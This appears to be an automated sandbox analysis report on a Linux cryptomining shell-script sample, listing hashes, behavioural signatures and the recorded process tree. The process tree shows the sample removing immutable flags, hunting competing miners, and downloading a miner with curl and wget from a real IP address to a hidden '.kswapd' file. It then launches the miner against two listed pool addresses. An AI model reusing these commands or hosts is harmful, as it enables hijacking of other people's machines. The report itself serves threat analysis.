Analysis
-
max time kernel: 18s
max time network: 20s
platform: debian-9_mipsel
resource: debian9-mipsel-20240418-en
resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 30-06-2024 18:39
Static task: static1
Behavioral task: behavioral1
  Sample: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
  Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
  Sample: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
  Resource: debian9-mipsel-20240418-en
General
-
Target: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Size: 5KB
MD5: 7b72cf30ac42c20f0a14b0b87425c00a
SHA1: 74402152ac0f0c9dfed6f76975080ce1d0d4584d
SHA256: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
SHA512: 1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
SSDEEP: 96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
ioc: /.cache/.kswapd  pid: 907  process: .kswapd
-
Attempts to change immutable files 20 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
pid / process:
889 grep, 809 grep, 817 grep, 821 grep, 833 grep,
857 grep, 805 grep, 861 grep, 869 grep, 845 grep,
849 grep, 763 chattr, 813 grep, 825 grep, 829 grep,
837 grep, 841 grep, 853 grep, 865 grep, 884 grep
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
description: File opened for modification  ioc: /usr/local/bin/.fYd3diJL  process: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Reads CPU attributes 1 TTPs 4 IoCs
Processes:
description: File opened for reading  ioc: /sys/devices/system/cpu/online  process: ps  (4 identical entries)
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
description: File opened for reading (all entries)  process: ps (all entries)
ioc:
/proc/8/status, /proc/374/status, /proc/76/cmdline, /proc/10/status, /proc/75/cmdline,
/proc/76/stat, /proc/76/status, /proc/774/stat, /proc/782/status, /proc/stat,
/proc/5/stat, /proc/20/cmdline, /proc/349/cmdline, /proc/71/stat, /proc/20/status,
/proc/13/stat, /proc/775/stat, /proc/770/stat, /proc/765/stat, /proc/81/cmdline,
/proc/self/stat, /proc/377/status, /proc/10/status, /proc/669/status, /proc/780/stat,
/proc/320/cmdline, /proc/657/stat, /proc/744/status, /proc/20/cmdline, /proc/657/status,
/proc/794/status, /proc/6/cmdline, /proc/352/cmdline, /proc/2/cmdline, /proc/24/stat,
/proc/378/stat, /proc/151/stat, /proc/15/status, /proc/684/cmdline, /proc/17/status,
/proc/37/status, /proc/691/stat, /proc/82/stat, /proc/770/cmdline, /proc/145/stat,
/proc/117/status, /proc/685/status, /proc/sys/kernel/osrelease, /proc/660/stat, /proc/7/status,
/proc/16/status, /proc/36/status, /proc/166/cmdline, /proc/9/cmdline, /proc/82/cmdline,
/proc/145/status, /proc/659/cmdline, /proc/776/cmdline, /proc/7/stat, /proc/18/cmdline,
/proc/757/cmdline, /proc/699/stat, /proc/10/cmdline, /proc/12/status
-
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
description: File opened for modification  ioc: /dev/shm/.fYd3diJL  process: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description: File opened for modification  ioc: /tmp/.fYd3diJL  process: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
- /tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh (depth 1): /tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
  - Write file to user bin folder
  - Writes file to shm directory
  - Writes file to tmp directory
- /bin/uname (depth 2): uname -a
- /bin/grep (depth 2): grep " rm does not remove dir"
- /bin/rm (depth 2): rm --help
- /usr/bin/wc (depth 2): wc -l
- /bin/grep (depth 2): grep -i "Dump libcurl equivalent"
- /usr/bin/curl (depth 2): curl --help
- /usr/bin/wc (depth 2): wc -l
- /bin/grep (depth 2): grep -i "wgetrc "
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/wget (depth 2): wget --version
- /usr/bin/head (depth 2): head /dev/urandom
- /usr/bin/tr (depth 2): tr -dc A-Za-z0-9
- /usr/bin/shuf (depth 2): shuf -i 4-16 -n 1
- /usr/bin/head (depth 2): head -c 8
- /bin/rm (depth 2): rm -f /tmp/.fYd3diJL
- /bin/rm (depth 2): rm -f /tmp/.fYd3diJL
- /bin/rm (depth 2): rm -f /usr/local/bin/.fYd3diJL
- /bin/rm (depth 2): rm -f /dev/shm/.fYd3diJL
- /bin/rm (depth 2): rm -f /.fYd3diJL
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v "sh "
- /bin/grep (depth 2): grep " sleep 120"
- /usr/bin/wc (depth 2): wc -l
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v "sh "
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep " sleep 120"
- /usr/bin/wc (depth 2): wc -l
- /bin/sleep (depth 2): sleep 120
- /bin/mkdir (depth 2): mkdir -p /.cache/
- /usr/bin/chattr (depth 2): chattr -i /.cache/
  - Attempts to change immutable files
- /bin/chmod (depth 2): chmod 1755 /.cache/
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v l0
- /bin/grep (depth 2): grep -v eth1
- /bin/grep (depth 2): grep -v lan0
- /bin/grep (depth 2): grep -v "^-"
- /bin/grep (depth 2): grep -v eth0
- /bin/grep (depth 2): grep -v inet0
- /bin/grep (depth 2): grep -v lano
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v knthread
- /bin/grep (depth 2): grep -vi aaaaaaaaaa
- /bin/grep (depth 2): grep -vi "java "
- /bin/grep (depth 2): grep -vi jenkins
- /bin/grep (depth 2): grep -vi exim
- /usr/bin/head (depth 2): head -n 1
- /usr/bin/awk (depth 2): awk "{if(\$3>=54.0) print \$11}"
- /bin/grep (depth 2): grep -v l0
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v eth1
- /bin/grep (depth 2): grep -v lan0
- /bin/grep (depth 2): grep -v "^-"
- /bin/grep (depth 2): grep -v eth0
- /bin/grep (depth 2): grep -v inet0
- /bin/grep (depth 2): grep -v lano
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v python
- /bin/grep (depth 2): grep -v knthread
- /bin/grep (depth 2): grep -vi aaaaaaaaaa
- /bin/grep (depth 2): grep -vi bash
- /bin/grep (depth 2): grep -vi exim
- /usr/bin/awk (depth 2): awk "{if(\$3>=0.0) print \$2}"
- /usr/bin/uniq (depth 2): uniq
- /bin/readlink (depth 2): readlink /proc/320/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/323/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/349/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/349/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/350/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/350/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/352/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/352/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/374/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/377/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/377/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/378/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/378/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/392/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/392/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/653/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/653/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/657/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/657/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/684/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/684/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/685/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/685/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/689/cwd
- /bin/cat (depth 2): cat /proc/689/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/690/cwd
- /bin/cat (depth 2): cat /proc/690/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/691/cwd
- /bin/cat (depth 2): cat /proc/691/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/695/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/695/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/699/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/761/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/761/exe
  - Attempts to change immutable files
- /bin/grep (depth 2): grep x86_64
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/curl (depth 2): curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
- /usr/bin/wget (depth 2): wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
- /bin/chmod (depth 2): chmod +x /.cache/.kswapd
- /.cache/.kswapd (depth 1): /.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
/tmp/.fYd3diJL
Filesize: 9B
MD5: ca4f95a3b88d33571504c0c4918c3a61
SHA1: 8fb9bd148f0618caa1b09a0817aa26ebd7ff00e3
SHA256: 20571736a3d21de70769ff71883303646210f51be9b10a6e017e67b488e2e7ba
SHA512: 3b025f820b3effb09fd0d19d0cf92db8a3efa6d41df4a534f09daa2a16f2b05b8f0880e4c18512c1fc886b03c991719b172d6aaa7330e1d7480c1297400a89b3